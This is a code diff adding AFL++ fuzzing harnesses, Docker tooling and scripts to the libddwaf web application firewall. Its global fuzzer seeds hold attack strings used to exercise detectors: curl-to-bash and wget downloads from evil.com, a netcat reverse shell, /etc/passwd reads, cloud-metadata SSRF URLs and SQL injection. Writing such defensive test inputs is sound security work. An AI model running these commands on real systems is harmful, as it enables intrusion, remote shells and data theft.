NAME) + + # Collect all source files for this fuzzer + set(FUZZER_ALL_SOURCES ${FUZZER_SOURCE}) + + # Find all other .cpp files in the same src directory + file(GLOB ADDITIONAL_SOURCES "${FUZZER_DIR}/*.cpp") + foreach(ADDITIONAL_SOURCE ${ADDITIONAL_SOURCES}) + # Skip main.cpp since it's already included + get_filename_component(ADDITIONAL_NAME ${ADDITIONAL_SOURCE} NAME) + if(NOT ${ADDITIONAL_NAME} STREQUAL "main.cpp") + list(APPEND FUZZER_ALL_SOURCES ${ADDITIONAL_SOURCE}) + endif() + endforeach() + + # Create the fuzzer target with all source files + add_afl_fuzzer(${FUZZER_NAME}_fuzz "${FUZZER_ALL_SOURCES}") + + # Add to our lists for dependencies and corpus creation + list(APPEND FUZZER_TARGETS ${FUZZER_NAME}_fuzz) + list(APPEND CORPUS_DIRS ${FUZZER_NAME}) endforeach() +# Generate corpus files during configuration phase if they don't exist +if(NOT EXISTS "${CMAKE_CURRENT_SOURCE_DIR}/global/sample_rules.yml") + message(STATUS "Generating corpus files using build_corpus.py...") + execute_process( + COMMAND python3 
${CMAKE_CURRENT_SOURCE_DIR}/global/scripts/build_corpus.py + WORKING_DIRECTORY ${CMAKE_SOURCE_DIR}/.. + RESULT_VARIABLE BUILD_CORPUS_RESULT + OUTPUT_VARIABLE BUILD_CORPUS_OUTPUT + ERROR_VARIABLE BUILD_CORPUS_ERROR + ) + if(NOT BUILD_CORPUS_RESULT EQUAL 0) + message(FATAL_ERROR "Failed to generate corpus files: ${BUILD_CORPUS_ERROR}") + endif() + message(STATUS "Corpus files generated successfully") +endif() + +# Create a target to build corpus using Python script (for manual rebuilding) +add_custom_target(build_corpus + COMMAND ${CMAKE_COMMAND} -E echo "Building corpus using build_corpus.py..." + COMMAND python3 ${CMAKE_CURRENT_SOURCE_DIR}/global/scripts/build_corpus.py + WORKING_DIRECTORY ${CMAKE_SOURCE_DIR}/.. + COMMENT "Regenerating corpus files and sample data for fuzzing" + VERBATIM +) + +# Create a target to build all fuzzers +add_custom_target(all_fuzzers DEPENDS ${FUZZER_TARGETS}) + +# Create a target to set up the fuzzing environment +add_custom_target(setup_fuzzing + DEPENDS all_fuzzers build_corpus +) diff --git a/fuzzer/README.md b/fuzzer/README.md new file mode 100644 index 000000000..bf0d24a02 --- /dev/null +++ b/fuzzer/README.md @@ -0,0 +1,93 @@ +# AFL++ Fuzzing Setup + +This folder contains `libfuzzer` harnesses with [AFL++](https://github.com/AFLplusplus/AFLplusplus/) wrapper for ease of use. + +## Structure + +``` +fuzz/ +├── common/ # Common utilities and generic wrapper +│ ├── afl_wrapper.hpp # Generic AFL++ wrapper +│ └── utils.hpp # Common utilities +├── docker/ # The dockerfile and script used to run the fuzzer easily +├── +│ └── corpus # Interesting seed inputs +│ ├── seed-1 +│ └── seed-2 +│ └── src # Individual main entrypoint for each fuzzer +│ └── main.cpp +``` + +## Usage + +### Building with Docker + +```bash +# Build the AFL++ Docker image +cd fuzz/docker +docker build -t libddwaf-afl . 
```

### Running the fuzzer in Docker

```bash
# The added capabilities are needed to run GDB and to apply kernel setting tweaks
docker run --privileged --cap-add=SYS_PTRACE --cap-add=SYS_ADMIN --security-opt seccomp=unconfined -v $(pwd):/workspace -it libddwaf-afl

# Build all fuzzers
./fuzzer/docker/build.sh

# Run all fuzzers
./fuzzer/docker/run_fuzzers.sh

# Run a single fuzzer
./fuzzer/docker/run_fuzzers.sh e2e

# Once you are done, you may want to minimize the corpus before syncing it back to git
./fuzzer/docker/minify_corpus.sh
```

## Adding New Fuzzers

To add a new fuzzer:

- Create a new folder in `/fuzzer/`, with a `src` and a `corpus` directory.
  - In `src`, add a `main.cpp` modeled on the existing fuzzers.
  - In `corpus`, add a `.gitkeep` file and at least one seed file.
- Run `./fuzzer/docker/build.sh`
- Run `./fuzzer/docker/run_fuzzers.sh MY_NEW_FUZZER_NAME`

Example:

```cpp
#include "common/afl_wrapper.hpp"
#include "your_header.hpp"

extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    // Your fuzzing logic here
    return 0;
}

AFL_FUZZ_TARGET("your_fuzzer", LLVMFuzzerTestOneInput)
```

### Building the fuzzers outside Docker

You may need to follow the AFL++ installation instructions to get the latest dependencies.
In most cases it is simpler to use the Dockerfile mentioned above, available in the `./docker/` directory.

```bash
# Install AFL++
git clone https://github.com/AFLplusplus/AFLplusplus
cd AFLplusplus
make && sudo make install

# Build fuzzers
mkdir fuzzer/build
cd fuzzer/build
CC=afl-clang-lto CXX=afl-clang-lto++ cmake ..
+make + +# Run fuzzer (change the corpus and output to the correct path) +afl-fuzz -i corpus/ -o output/ ./sha256_fuzz +``` diff --git a/fuzzer/cmdi_detector/corpus/.gitkeep b/fuzzer/cmdi_detector/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/cmdi_detector/src/main.cpp b/fuzzer/cmdi_detector/src/main.cpp index d51be7b54..4523568dd 100644 --- a/fuzzer/cmdi_detector/src/main.cpp +++ b/fuzzer/cmdi_detector/src/main.cpp @@ -4,7 +4,9 @@ // This product includes software developed at Datadog (https://www.datadoghq.com/). // Copyright 2021 Datadog, Inc. +#include "../common/afl_wrapper.hpp" #include +#include #include #include "condition/cmdi_detector.hpp" @@ -33,20 +35,22 @@ std::pair, std::string_view> deserialize( return {}; } - const auto resource_size = *reinterpret_cast(data); + std::size_t resource_size; + std::memcpy(&resource_size, data, sizeof(std::size_t)); data += sizeof(std::size_t); size -= sizeof(std::size_t); - if (size < sizeof(std::size_t)) { - return {}; - } - std::vector resource; resource.reserve(resource_size); for (std::size_t i = 0; i < resource_size; ++i) { - const auto arg_size = *reinterpret_cast(data); + if (size < sizeof(std::size_t)) { + return {}; + } + + std::size_t arg_size; + std::memcpy(&arg_size, data, sizeof(std::size_t)); data += sizeof(std::size_t); size -= sizeof(std::size_t); @@ -65,7 +69,8 @@ std::pair, std::string_view> deserialize( return {}; } - const auto param_size = *reinterpret_cast(data); + std::size_t param_size; + std::memcpy(¶m_size, data, sizeof(std::size_t)); data += sizeof(std::size_t); size -= sizeof(std::size_t); @@ -210,3 +215,6 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT("cmdi_detector_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/common/afl_wrapper.hpp b/fuzzer/common/afl_wrapper.hpp new file mode 
100644 index 000000000..d076b0f06 --- /dev/null +++ b/fuzzer/common/afl_wrapper.hpp @@ -0,0 +1,160 @@ +// Unless explicitly stated otherwise all files in this repository are +// dual-licensed under the Apache-2.0 License or BSD-3-Clause License. +// +// This product includes software developed at Datadog (https://www.datadoghq.com/). +// Copyright 2021 Datadog, Inc. + +#pragma once + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +// Standard includes for reading input +#include + +#define AFL_LOOP_ITERATIONS 1000 + +namespace ddwaf_afl { + +// Type alias for LLVMFuzzOneInput function +using FuzzFunction = std::function; +using InitFunction = std::function; + +// Standalone mode helper +int run_standalone(const char *name, FuzzFunction fuzz_func, int argc, char **argv) +{ + // Standalone mode - read from file or stdin for testing + std::vector data; + + if (argc > 1) { + // Read from file + std::ifstream file(argv[1], std::ios::binary); + if (!file) { + std::cerr << "Failed to open file: " << argv[1] << std::endl; + return 1; + } + + file.seekg(0, std::ios::end); + size_t size = file.tellg(); + file.seekg(0, std::ios::beg); + + data.resize(size); + file.read(reinterpret_cast(data.data()), size); + } else { + // Read from stdin + char buffer[4096]; + while (std::cin.read(buffer, sizeof(buffer)) || std::cin.gcount() > 0) { + size_t bytes_read = std::cin.gcount(); + data.insert(data.end(), buffer, buffer + bytes_read); + } + } + + if (data.empty()) { + std::cerr << "No input data provided" << std::endl; + return 1; + } + + std::cout << "Running " << name << " with " << data.size() << " bytes of input" << std::endl; + int result = fuzz_func(data.data(), data.size()); + std::cout << "Fuzzer returned: " << result << std::endl; + return result; +} + +// AFL++ mode helper - this will be called from main with proper persistent mode +int run_afl_iteration(FuzzFunction fuzz_func) +{ + static uint8_t input_buffer[1024 * 1024]; // 
// Defines main() for a fuzz target that needs one-time setup before any input is processed.
//
//   name       label forwarded to ddwaf_afl::run_standalone
//   fuzz_func  fuzz entry point, forwarded to run_standalone / run_afl_iteration
//   init_func  called once as init_func(&argc, &argv); a non-zero result is printed to
//              stderr and becomes the exit code of main()
//
// After initialization, extra command-line arguments (argc > 1) select standalone mode.
// Otherwise main() enters the __AFL_LOOP persistent loop and leaves it as soon as
// ddwaf_afl::run_afl_iteration returns 0.
// NOTE(review): `if (init_func)` is always true when a function name is passed;
// presumably it exists so a null function pointer can be supplied — confirm.
#define AFL_FUZZ_TARGET_WITH_INIT(name, fuzz_func, init_func) \
    int main(int argc, char **argv) \
    { \
        /* Handle initialization if provided */ \
        if (init_func) { \
            int result = init_func(&argc, &argv); \
            if (result != 0) { \
                std::cerr << "Initialization failed with code: " << result << std::endl; \
                return result; \
            } \
        } \
        \
        /* Handle command line arguments for standalone mode */ \
        if (argc > 1) { \
            return ddwaf_afl::run_standalone(name, fuzz_func, argc, argv); \
        } \
        \
        /* AFL++ persistent mode loop - must be in main function */ \
        /* This runs up to AFL_LOOP_ITERATIONS iterations per process for better performance */ \
        while (__AFL_LOOP(AFL_LOOP_ITERATIONS)) { \
            if (!ddwaf_afl::run_afl_iteration(fuzz_func)) { \
                break; \
            } \
        } \
        \
        return 0; \
    }
// For targets that need custom initialization
//
// Expands to three definitions: an LLVMFuzzerInitialize that runs `init_code`, an
// LLVMFuzzerTestOneInput that runs `func_call`, and the main() produced by
// AFL_FUZZ_TARGET_WITH_INIT wired to those two functions.
//
//   name       forwarded to AFL_FUZZ_TARGET_WITH_INIT
//   header     not referenced anywhere in the expansion
//   init_code  statement(s) pasted into LLVMFuzzerInitialize; `argc` and `argv` are in scope
//   func_call  statement(s) pasted into LLVMFuzzerTestOneInput; `data` and `size` are in scope
//
// Both generated functions unconditionally return 0.
#define AFL_INIT_TARGET(name, header, init_code, func_call) \
    extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) \
    { \
        init_code; \
        return 0; \
    } \
    extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) \
    { \
        func_call; \
        return 0; \
    } \
    AFL_FUZZ_TARGET_WITH_INIT(name, LLVMFuzzerTestOneInput, LLVMFuzzerInitialize)
// Reinterprets a raw byte range as text without copying it.
// The returned view aliases `data`, so it is only valid while that buffer is alive.
inline std::string_view bytes_to_string_view(const uint8_t *data, size_t size)
{
    const auto *chars = reinterpret_cast<const char *>(data);
    return {chars, size};
}
// Simple serializer for complex input formats.
//
// Values are appended to an in-memory byte buffer in host byte order:
//   - add_string writes a 16-bit length prefix followed by the string bytes
//   - add_value  writes the object representation of `value` (sizeof(T) bytes)
class InputSerializer {
public:
    InputSerializer() = default;

    // Appends `str` as <uint16 length><bytes>.
    // The prefix can only describe 65535 bytes, so longer strings are truncated to that
    // size. Previously the prefix wrapped modulo 65536 while the full payload was still
    // written, leaving a prefix that did not describe the bytes following it.
    void add_string(std::string_view str)
    {
        const size_t payload_size =
            str.size() > UINT16_MAX ? static_cast<size_t>(UINT16_MAX) : str.size();
        const auto length = static_cast<uint16_t>(payload_size);

        append_bytes(&length, sizeof(length));
        append_bytes(str.data(), payload_size);
    }

    // Appends the raw bytes of `value`.
    template <typename T> void add_value(const T &value) { append_bytes(&value, sizeof(value)); }

    const std::vector<uint8_t> &data() const { return data_; }
    const uint8_t *raw_data() const { return data_.data(); }
    size_t size() const { return data_.size(); }

private:
    // Appends `count` bytes starting at `src` to the buffer.
    void append_bytes(const void *src, size_t count)
    {
        const auto *first = static_cast<const uint8_t *>(src);
        data_.insert(data_.end(), first, first + count);
    }

    std::vector<uint8_t> data_;
};
# AFL++ Docker Image for libddwaf fuzzing
FROM ubuntu:22.04

# Avoid interactive prompts during package installation
ENV DEBIAN_FRONTEND=noninteractive

# Revisions of the external tools. The defaults match the commits pinned by the CI
# fuzzing workflow; override with --build-arg to try another revision.
ARG AFLPLUSPLUS_REF=b89727bea903aec80d003b6764fb53c232d33d95
ARG AFL_COV_FAST_REF=7a96b578bb227e874bf75f8cb759e8ac2b180453

# Install basic dependencies and add LLVM repository
RUN apt-get update && apt-get install -y \
        wget \
        gnupg \
        software-properties-common \
    && wget -O - https://apt.llvm.org/llvm-snapshot.gpg.key | apt-key add - \
    && echo 'deb http://apt.llvm.org/jammy/ llvm-toolchain-jammy-19 main' > /etc/apt/sources.list.d/llvm-toolchain.list

# Install system dependencies.
# `apt-get update` runs in the same layer as `apt-get install`, so a cached package
# index is never combined with a changed package list.
# NOTE(review): linux-tools-$(uname -r) resolves to the kernel of the machine running
# `docker build`; confirm that package exists for every build host in use.
RUN apt-get update && apt-get install -y \
        build-essential \
        cmake \
        git \
        curl \
        vim \
        python3 \
        python3-pip \
        llvm-19 \
        llvm-19-dev \
        llvm-19-tools \
        lcov \
        clang-19 \
        lld-19 \
        libc++-19-dev \
        libc++abi-19-dev \
        ninja-build \
        libssl-dev \
        libcurl4-openssl-dev \
        zlib1g-dev \
        xxd \
        gdb \
        linux-tools-common \
        linux-tools-generic \
        linux-tools-$(uname -r) \
    && rm -rf /var/lib/apt/lists/*

# Set up clang as default compiler
RUN update-alternatives --install /usr/bin/clang clang /usr/bin/clang-19 100 && \
    update-alternatives --install /usr/bin/clang++ clang++ /usr/bin/clang++-19 100 && \
    update-alternatives --install /usr/bin/llvm-config llvm-config /usr/bin/llvm-config-19 100 && \
    update-alternatives --install /usr/bin/llvm-profdata llvm-profdata /usr/bin/llvm-profdata-19 100 && \
    update-alternatives --install /usr/bin/llvm-cov llvm-cov /usr/bin/llvm-cov-19 100

# Clone AFL++ at the pinned revision
WORKDIR /opt
RUN git config --global --add safe.directory /workspace && \
    git clone https://github.com/AFLplusplus/AFLplusplus.git && \
    git -C AFLplusplus checkout "${AFLPLUSPLUS_REF}"
WORKDIR /opt/AFLplusplus

# Build AFL++ with LTO support
RUN make clean && \
    make -j$(nproc) all && \
    make install

# Clone afl-cov-fast (coverage reporting) at the pinned revision and install its
# Python requirements
WORKDIR /opt
RUN git clone --recursive https://github.com/airbus-seclab/afl-cov-fast.git && \
    git -C afl-cov-fast checkout "${AFL_COV_FAST_REF}" && \
    git -C afl-cov-fast submodule update --init --recursive
WORKDIR /opt/afl-cov-fast
RUN pip3 install -r requirements.txt

# Set AFL++ environment variables
ENV AFL_SKIP_CPUFREQ=1
ENV AFL_I_DONT_CARE_ABOUT_MISSING_CRASHES=1
ENV PATH="/opt/AFLplusplus:${PATH}"

# Create workspace directory
WORKDIR /workspace

# Copy build script
COPY build.sh /opt/build.sh
RUN chmod +x /opt/build.sh

# Create user for safer fuzzing
RUN useradd -m -s /bin/bash fuzzer && \
    chown -R fuzzer:fuzzer /workspace

# Default command
CMD ["/bin/bash"]

# Expose common AFL++ environment setup
ENV CC=afl-clang-lto
ENV CXX=afl-clang-lto++
ENV AFL_USE_ASAN=1
ENV AFL_USE_UBSAN=1
#!/bin/bash

# Script to minify the corpus for all fuzzers
#
# For every fuzzer in FUZZERS:
#   1. copy the AFL++ queue entries from $AFL_FUZZ_DIR into the checked-in corpus
#   2. run afl-cmin on that corpus
#   3. replace the corpus with the minimized set
# A fuzzer whose minimization fails keeps its current corpus and the script moves on
# to the next one.

set -u

PROJECT_ROOT="/workspace"
FUZZER_BUILD_DIR="$PROJECT_ROOT/fuzzer/build"
AFL_FUZZ_DIR="$PROJECT_ROOT/o"

# Check if we're in the container environment
if [[ ! -f "/opt/build.sh" ]]; then
    echo "Warning: This script is designed to run in the fuzz container."
    echo "Consider running: docker run --rm -v \$(pwd):/workspace fuzzer-image ./fuzzer/docker/minify_corpus.sh"
fi

# All paths below are relative to the project root; running elsewhere would put the
# temporary corpus_minified_* directories in the wrong place.
cd "$PROJECT_ROOT" || exit 1

# Define all fuzzers based on the available binaries
# TODO: automatically detect all fuzzers in the build directory
FUZZERS=(
    "cmdi_detector"
    "e2e"
    "http_endpoint_fingerprint"
    "http_header_fingerprint"
    "http_network_fingerprint"
    "jwt_decode"
    "lfi_detector"
    "session_fingerprint"
    "sha256"
    "shell_tokenizer"
    "shi_detector_array"
    "shi_detector_string"
    "sql_tokenizer"
    "sqli_detector"
    "ssrf_detector"
    "uri_parse"
    "global"
)

for fuzzer in "${FUZZERS[@]}"; do
    corpus_dir="$PROJECT_ROOT/fuzzer/$fuzzer/corpus"
    queue_dir="$AFL_FUZZ_DIR/$fuzzer/default/queue"
    minified_dir="corpus_minified_$fuzzer"
    binary="$FUZZER_BUILD_DIR/${fuzzer}_fuzz"

    echo "Starting minification for $fuzzer..."
    echo "deleting previous minified corpus..."
    rm -rf "$minified_dir"

    # We move all the new things in the queue
    echo "Moving new things in the queue to the native corpus..."
    mkdir -p "$corpus_dir"
    if compgen -G "$queue_dir/*" > /dev/null; then
        cp -f "$queue_dir"/* "$corpus_dir/"
    else
        echo "No queue entries found in $queue_dir, minimizing the existing corpus only"
    fi

    echo "Minifying corpus..."
    if ! afl-cmin -T "$(nproc)" -i "$corpus_dir" -o "$minified_dir" "$binary"; then
        # Never delete the corpus when there is nothing to replace it with
        echo "afl-cmin failed for $fuzzer, keeping the existing corpus"
        rm -rf "$minified_dir"
        continue
    fi

    if ! compgen -G "$minified_dir/*" > /dev/null; then
        echo "afl-cmin produced no files for $fuzzer, keeping the existing corpus"
        rm -rf "$minified_dir"
        continue
    fi

    echo "Cleaning up old corpus and previous minified corpus..."
    # ${var:?} aborts instead of expanding to "/*" if the variable is ever empty
    rm -rf "${corpus_dir:?}"/*
    mkdir -p "$corpus_dir"
    mv "$minified_dir"/* "$corpus_dir/"
    rm -rf "$minified_dir"
    echo "Done"
done
# Function to run a single fuzzer and generate its coverage
#
# Arguments:
#   $1  fuzzer name; the binary is $FUZZER_BUILD_DIR/<name>_fuzz and the seed corpus is
#       $PROJECT_ROOT/fuzzer/<name>/corpus
# Returns 1 when the binary or the corpus directory is missing. A non-zero exit of
# afl-fuzz or of the coverage tool is reported but does not fail the function.
run_fuzzer() {
    local fuzzer_name="$1"
    local binary="$FUZZER_BUILD_DIR/${fuzzer_name}_fuzz"
    local corpus_dir="$PROJECT_ROOT/fuzzer/$fuzzer_name/corpus"
    # Fuzzing output and coverage data share the same per-fuzzer directory
    local output_dir="$OUTPUT_DIR/$fuzzer_name"
    local coverage_dir="$OUTPUT_DIR/$fuzzer_name"

    if [[ ! -f "$binary" ]]; then
        echo "❌ Binary not found: $binary"
        return 1
    fi

    if [[ ! -d "$corpus_dir" ]]; then
        echo "❌ Corpus directory not found: $corpus_dir"
        return 1
    fi

    echo "🚀 Running $fuzzer_name fuzzer..."
    echo " Binary: $binary"
    echo " Corpus: $corpus_dir"
    echo " Output: $output_dir"
    echo " Coverage: $coverage_dir"

    # Clean up previous output for this fuzzer
    rm -rf "$output_dir"
    rm -rf "$coverage_dir"
    mkdir -p "$output_dir"
    mkdir -p "$coverage_dir"

    # Set AFL environment variables
    export AFL_SKIP_CPUFREQ=1
    export AFL_I_DONT_CARE_ABOUT_MISSING_CRASHES=1
    export AFL_FAST_CAL=1

    # Run AFL++ with timeout; `timeout` exits with 124 when the limit was reached
    timeout "$FUZZER_TIMEOUT" afl-fuzz -i "$corpus_dir" -o "$output_dir" -D "$binary" || {
        local exit_code=$?
        if [[ $exit_code -eq 124 ]]; then
            # Report the configured limit rather than a hard-coded duration
            echo "✅ $fuzzer_name completed ($FUZZER_TIMEOUT timeout reached)"
        else
            echo "⚠️ $fuzzer_name exited with code $exit_code"
        fi
    }

    # Generate individual coverage report for this fuzzer
    echo "📊 Generating coverage for $fuzzer_name..."
    echo " Coverage output: $coverage_dir"

    # Run afl-cov-fast for this specific fuzzer
    /opt/afl-cov-fast/afl-cov-fast.py \
        -m llvm \
        --code-dir "$PROJECT_ROOT" \
        --afl-fuzzing-dir "$output_dir" \
        --coverage-cmd "$binary" \
        --binary-path "$binary" \
        "-j$(nproc)" || {
        echo "⚠️ Coverage generation failed for $fuzzer_name"
    }

    echo "✅ $fuzzer_name fuzzing and coverage complete"
    echo ""
}
// Canned request URIs; the trailing comment on each entry names the attack class it
// is meant to resemble. create_request_object uses the entry at the fuzz-provided
// index as "server.request.uri_raw" when that index is within range, and falls back
// to the raw fuzz string otherwise.
const std::vector attack_uris = {
    "/app?file=../../../../etc/passwd",                    // LFI attack
    "/search?q=test; cat /etc/passwd",                     // CMDI attack
    "/proxy?url=http://169.254.169.254/metadata",          // SSRF attack
    "/download?path=../../../windows/system32/config/sam", // LFI Windows
    "/exec?cmd=wget http://evil.com/shell.sh",             // CMDI with download
    "/redirect?target=file:///etc/hosts",                  // SSRF file scheme
    "/api/v1/users?filter='; DROP TABLE users;--",         // SQL injection
    "/upload?filename=shell.php%00.jpg"                    // Null byte injection
};
"system=$(wget -qO- http://evil.com/cmd) && eval $REPLY" // Complex shell expansion +}; +// Create shell command arrays to exercise shi_common.cpp +const std::vector> shell_commands = { + {"sh", "-c", "cat /etc/passwd", nullptr}, {"bash", "-c", "ls -la; whoami", nullptr}, + {"curl", "-o", "/tmp/shell.sh", "http://evil.com/backdoor", nullptr}, + {"wget", "-O", "/dev/null", "http://169.254.169.254/metadata", nullptr}}; + +// Generate URLs that trigger SSRF detector +const std::vector ssrf_urls = { + "http://169.254.169.254/latest/meta-data/", // AWS metadata + "http://127.0.0.1:8080/admin/config", // Local admin + "file:///etc/passwd", // File scheme + "ftp://internal.company.com/secrets/", // Internal FTP + "http://localhost:3306/mysql", // Database port + "gopher://127.0.0.1:25/", // Gopher protocol + "dict://localhost:11211/stats", // Dict protocol + "ldap://internal.ad.company.com/" // LDAP +}; + +// Generate IP addresses including some that match blocked IPs in rules_data +const std::vector ip_addresses = { + "192.168.1.100", // Matches blocked_ips data + "10.0.0.50", // Matches blocked_ips data + "127.0.0.1", // Localhost + "203.0.113.1", // Test IP + "198.51.100.1", // Test IP + "172.16.0.1", // Private IP + "10.0.0.1", // Private IP + "192.168.1.1" // Private IP +}; + +// Create SQL statements with database-specific syntax to exercise tokenizers +const std::vector sql_statements = { + "SELECT * FROM users WHERE id = $1 AND status = 'active'", // PostgreSQL style + "SELECT name FROM products WHERE price < ? LIMIT 10", // Generic/MySQL style + "INSERT INTO logs (message, created_at) VALUES (?, datetime('now'))", // SQLite style + "UPDATE accounts SET balance = balance + ? 
// Cycle through different database types to exercise specific tokenizers
// Each entry is a database system identifier; the trailing comment names the
// tokenizer that value is expected to select.
// NOTE(review): the code consuming this table is outside the visible chunk —
// presumably the value is sent as "server.db.system"; confirm against the caller.
const std::vector db_types = {
    "postgresql", // Triggers pgsql_tokenizer
    "pgsql",      // Alternative PostgreSQL trigger
    "sqlite",     // Triggers sqlite_tokenizer
    "mysql",      // Triggers mysql_tokenizer
    "mysql2",     // Alternative MySQL trigger
    "oracle",     // Triggers oracle tokenizer
    "doctrine",   // Triggers doctrine tokenizer
    "hsqldb"      // Triggers hsqldb tokenizer
};
+ "SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c", +}; + +const std::vector http_headers_keys = { + "Content-Type", + "Host", + "User-Agent", + "Accept", + "Accept-Encoding", + "Accept-Language", + "Accept-Charset", + "Connection", +}; + +const std::vector http_headers_values = { + "application/json", + "application/x-www-form-urlencoded", + "multipart/form-data", + "text/plain", + "application/octet-stream", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", + "application/json,text/html", + "gzip,deflate", + "en-US,en;q=0.9", + "utf-8", + "keep-alive", +}; + +// Cookie key-value pairs to exercise normalize_key and normalize_value functions +const std::vector> cookie_pairs = { + {"session_id", "1234567890"}, {"user_id", "9876543210"}, + {"theme", "dark,mode"}, // Contains comma to test normalize_value escaping + {"CSRF_TOKEN", "ABC,DEF=GHI"}, // Mixed case and special chars for normalize_key + {"preferences", "lang=en,theme=dark"}, // Nested comma values + {"User-Agent", "Mozilla/5.0"}, // Dash in key name + {"api_key", "key,with,commas"}, // Multiple commas to test escaping + {"auth_token", "bearer_token_123"}, {"cart_items", "item1,item2,item3"}, // Array-like values + {"notification,settings", "enabled"}, // Comma in key name to test normalize_key +}; + +const std::vector query_params = { + "page=1", + "page=1&limit=10", + "page=1&limit=10&sort=name", + "page=1&limit=10&sort=name&order=asc", + "page=1&limit=10&sort=name&order=asc&filter=active", + "page=1&limit=10&sort=name&order=asc&filter=active&search=john", + "page=1&limit=10&sort=name&order=asc&filter=active&search=john&sort=email", + "page=1&limit=10&sort=name&order=asc&filter=active&search=john&sort=email&order=desc", + "page=1&limit=10&sort=name&order=asc&filter=active&search=john&sort=email&order=desc&page=2", + "page=1&limit=10&sort=name&order=asc&filter=active&search=john&sort=email&order=desc&page=2&" + "limit=20", +}; + +const std::vector user_ids = { + "1234567890", + "1234567890", 
+}; + +const std::vector session_ids = { + "1234567890", + "1234567890", +}; + +const std::vector custom_resources_names = { + "server.io.fs.file", + "server.request.query", + "server.request.body", + "server.request.uri_raw", + "server.request.headers", + "server.request.uri.raw", + "server.request.params", + "server.request.cookies", + "server.request.trailers", + "server.request.path_params", + "server.request.method", + "server.request.headers.no_cookies", + "server.io.net.url", + "server.db.statement", + "server.db.system", + "http.client_ip", + "grpc.server.method", + "grpc.server.request.message", + "grpc.server.request.metadata", +}; + +// Helper to create a request object from input data +ddwaf_object create_request_object(InputSplitter &splitter) +{ + ddwaf_object root, tmp; + ddwaf_object_map(&root); + + // Use first byte to determine request structure type + uint8_t request_type = splitter.get() % 6; + + switch (request_type) { + case 0: { + // HTTP request structure + auto uri_index = splitter.get(); + auto uri = splitter.get_string(); + + auto query_index = splitter.get(); + auto query = splitter.get_string(); + + auto body_type = splitter.get(); + auto body = splitter.get_string(); + + auto method_index = splitter.get(); + auto method = splitter.get_string(); + + auto jwt_index = splitter.get(); + + if (uri_index < attack_uris.size()) { + // Generate URI patterns that trigger security detectors + const char *selected_uri = attack_uris[uri_index]; + ddwaf_object_map_addl(&root, "server.request.uri_raw", 22, + ddwaf_object_stringl(&tmp, selected_uri, strlen(selected_uri))); + } else { + // Use the URI string directly as fallback + ddwaf_object_map_addl(&root, "server.request.uri_raw", 22, + ddwaf_object_stringl(&tmp, uri.data(), uri.size())); + } + + if (query_index < attack_queries.size()) { + // Generate query patterns for security detectors with complex shell tokenization + const char *selected_query = attack_queries[query_index]; + 
ddwaf_object_map_addl(&root, "server.request.query", 20, + ddwaf_object_stringl(&tmp, selected_query, strlen(selected_query))); + } else { + // Use the query string directly as fallback + ddwaf_object_map_addl(&root, "server.request.query", 20, + ddwaf_object_stringl(&tmp, query.data(), query.size())); + } + + // Create complex nested structures for extract_schema processor + switch (body_type) { + case 0: { + // Complex nested object structure for schema extraction + ddwaf_object body_obj, data_obj, user_obj, profile_obj, settings_obj, metadata_obj; + ddwaf_object name_tmp, email_tmp, age_tmp, active_tmp, theme_tmp, lang_tmp; + ddwaf_object version_tmp, timestamp_tmp, null_tmp, float_tmp, permissions_array; + + ddwaf_object_map(&body_obj); + ddwaf_object_map(&data_obj); + ddwaf_object_map(&user_obj); + ddwaf_object_map(&profile_obj); + ddwaf_object_map(&settings_obj); + ddwaf_object_map(&metadata_obj); + ddwaf_object_array(&permissions_array); + + // Create diverse data types for comprehensive schema analysis + ddwaf_object_map_addl( + &profile_obj, "name", 4, ddwaf_object_stringl(&name_tmp, "John Doe", 8)); + ddwaf_object_map_addl( + &profile_obj, "email", 5, ddwaf_object_stringl(&email_tmp, "john@example.com", 16)); + ddwaf_object_map_addl(&profile_obj, "age", 3, ddwaf_object_signed(&age_tmp, 30)); + ddwaf_object_map_addl(&profile_obj, "active", 6, ddwaf_object_bool(&active_tmp, true)); + ddwaf_object_map_addl(&profile_obj, "score", 5, ddwaf_object_float(&float_tmp, 95.7)); + ddwaf_object_map_addl(&profile_obj, "deprecated", 10, ddwaf_object_null(&null_tmp)); + + ddwaf_object_map_addl( + &settings_obj, "theme", 5, ddwaf_object_stringl(&theme_tmp, "dark", 4)); + ddwaf_object_map_addl( + &settings_obj, "language", 8, ddwaf_object_stringl(&lang_tmp, "en", 2)); + + // Add metadata with various types for deeper schema extraction + ddwaf_object_map_addl( + &metadata_obj, "version", 7, ddwaf_object_stringl(&version_tmp, "2.1.0", 5)); + ddwaf_object_map_addl( + 
&metadata_obj, "timestamp", 9, ddwaf_object_unsigned(×tamp_tmp, 1640995200)); + + // Create permissions array for array schema extraction + ddwaf_object perm1, perm2, perm3; + ddwaf_object_stringl(&perm1, "read", 4); + ddwaf_object_stringl(&perm2, "write", 5); + ddwaf_object_stringl(&perm3, "admin", 5); + ddwaf_object_array_add(&permissions_array, &perm1); + ddwaf_object_array_add(&permissions_array, &perm2); + ddwaf_object_array_add(&permissions_array, &perm3); + + ddwaf_object_map_addl(&user_obj, "profile", 7, &profile_obj); + ddwaf_object_map_addl(&user_obj, "settings", 8, &settings_obj); + ddwaf_object_map_addl(&user_obj, "permissions", 11, &permissions_array); + ddwaf_object_map_addl(&data_obj, "user", 4, &user_obj); + ddwaf_object_map_addl(&data_obj, "metadata", 8, &metadata_obj); + ddwaf_object_map_addl(&body_obj, "data", 4, &data_obj); + ddwaf_object_map_addl(&root, "server.request.body", 19, &body_obj); + break; + } + case 1: { + // Complex array structure for schema extraction + ddwaf_object body_obj, items_array, products_array, nested_obj; + ddwaf_object item1, item2, item3, product1, product2; + ddwaf_object id1_tmp, name1_tmp, id2_tmp, name2_tmp, id3_tmp, name3_tmp; + ddwaf_object price1_tmp, price2_tmp, available1_tmp, available2_tmp; + ddwaf_object category_tmp, tags_array, tag1, tag2; + + 